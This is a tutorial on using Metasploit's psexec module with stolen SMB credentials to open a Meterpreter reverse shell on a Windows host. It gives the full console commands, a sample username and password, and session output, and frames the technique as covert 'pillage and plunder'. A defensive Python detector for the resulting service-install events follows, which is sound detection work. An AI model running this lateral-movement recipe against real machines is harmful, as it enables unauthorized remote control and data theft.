Get a Meterpreter Shell Using SMB Credentials

The Meterpreter shell in Metasploit is a fantastic way to interact with a compromised box. It runs entirely in memory and leaves no trace of itself after you disconnect, allowing you to pillage and plunder cleanly without leaving any tracks.

I find myself using it fairly frequently against Windows machines that I’ve already gotten credentials for via some other means. In those cases it doesn’t make sense to use an actual exploit to get a Meterpreter shell going.

Use the psexec exploit (which actually isn’t an exploit, but whatever) to accomplish this:

msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set rhost 10.10.0.122
rhost => 10.10.0.122
msf exploit(psexec) > set smbpass Changem3
smbpass => Changem3
msf exploit(psexec) > set smbuser mark
smbuser => mark
msf exploit(psexec) > show options

Module options (exploit/windows/smb/psexec):

Name       Current Setting  Required  Description
----       ---------------  --------  -----------
RHOST      10.10.0.122      yes       The target address
RPORT      445              yes       Set the SMB service port
SMBDomain  WORKGROUP        no        The Windows domain to use for authentication
SMBPass    Changem3         no        The password for the specified username
SMBUser    mark             no        The username to authenticate as

Payload options (windows/meterpreter/reverse_tcp):

Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique: seh, thread, process, none
LHOST     10.10.0.149      yes       The listen address
LPORT     4444             yes       The listen port
msf exploit(psexec) > exploit

[*] Started reverse handler on 10.10.0.149:4444
[*] Connecting to the server...
[*] Authenticating to 10.10.0.122:445|WORKGROUP as user 'mark'...
[*] Uploading payload...
[*] Created OUBfKBZr.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:10.10.0.122[svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:10.10.0.122[svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (PWFeuNyE - "MthJLAgTDPzWvZXfaw")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Sending stage (749056 bytes) to 10.10.0.122
[*] Deleting OUBfKBZr.exe...
[*] Meterpreter session 1 opened (10.10.0.149:4444 -> 10.10.0.122:1052) at 2011-03-13 17:08:13 -0700
meterpreter > sysinfo
Computer   : EARTH
OS         : Windows XP (Build 2600, Service Pack 3).
Arch       : x86
Language   : en_US
Meterpreter: x86/win32

File and Print Sharing (445/tcp) needs to be enabled on the target host (duh) or this obviously won’t work.
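The transcript above also shows what this approach leaves behind on the target: a randomly named executable uploaded over SMB, a randomly named service created, started and then removed, and the payload staged in memory. From the defender's side that service install is the visible artifact. The following is an added example, not code from the original post or from the Metasploit project: a small Python filter over constructed, flattened System-log lines for Event ID 7045 (Service Control Manager: a service was installed). The field names are the real 7045 fields; the one-line `key="value"` layout and all sample values are constructed here, with the random-looking names modeled on the output above. The heuristic (eight-letter mixed-case service name, eight-letter mixed-case binary directly under the system root) is an assumption about this module's default naming, not a documented signature.

```python
import re

# Constructed sample events in a flattened key="value" rendering of the System
# log. Field names are the real 7045 fields; layout and values are made up here.
SAMPLE_EVENTS = [
    r'EventID="7045" ServiceName="Vendor Update Service (vupdate)" ImagePath="C:\ProgramData\Vendor\vupdate.exe /svc" ServiceType="user mode service" StartType="auto start" AccountName="LocalSystem"',
    r'EventID="7045" ServiceName="PWFeuNyE" ImagePath="%SYSTEMROOT%\OUBfKBZr.exe" ServiceType="user mode service" StartType="demand start" AccountName="LocalSystem"',
    r'EventID="7036" ServiceName="PWFeuNyE" State="running"',
    r'EventID="7045" ServiceName="Spooler" ImagePath="%SystemRoot%\System32\spoolsv.exe" ServiceType="user mode service" StartType="auto start" AccountName="LocalSystem"',
]

FIELD_RE = re.compile(r'(\w+)="([^"]*)"')
EIGHT_LETTERS = re.compile(r'^[A-Za-z]{8}$')


def parse_event(line):
    """Turn one flattened key="value" line into a dict."""
    return dict(FIELD_RE.findall(line))


def looks_random(name):
    """Eight letters with both upper and lower case, e.g. PWFeuNyE or OUBfKBZr.
    Assumed default naming of the module; an operator can choose other names."""
    return bool(EIGHT_LETTERS.match(name)) and name != name.lower() and name != name.upper()


def split_image_path(image_path):
    """Return (directory, file) of the service binary, ignoring arguments.
    Sample paths here contain no spaces, so the first token is the binary."""
    exe = image_path.strip('"').split()[0].replace('/', '\\')
    head, _, tail = exe.rpartition('\\')
    return head, tail


def in_system_root(directory):
    """The ADMIN$ share maps to the Windows directory, so the uploaded binary
    sits directly under %SystemRoot%, not in System32 or a vendor folder."""
    return directory.lower() in ('%systemroot%', 'c:\\windows')


def flag_psexec_style_installs(lines):
    """Return (service_name, binary) pairs for 7045 events whose service and
    binary names both look random and whose binary lives in the system root."""
    flagged = []
    for line in lines:
        ev = parse_event(line)
        if ev.get('EventID') != '7045':
            continue
        name = ev.get('ServiceName', '')
        directory, exe = split_image_path(ev.get('ImagePath', ''))
        stem = exe[:-4] if exe.lower().endswith('.exe') else exe
        if looks_random(name) and looks_random(stem) and in_system_root(directory):
            flagged.append((name, exe))
    return flagged


if __name__ == '__main__':
    for service, binary in flag_psexec_style_installs(SAMPLE_EVENTS):
        print(f'suspicious service install: {service} -> {binary}')
```

Name-shape heuristics like this only catch the module's default behaviour, since the service and binary names are chosen by the operator's tooling. A more durable detection correlates the 7045 install with the network logon that preceded it (Security Event ID 4624, logon type 3) and with write access to the ADMIN$ share (Security Event ID 5145), which is the combination the transcript above produces regardless of what the service is called.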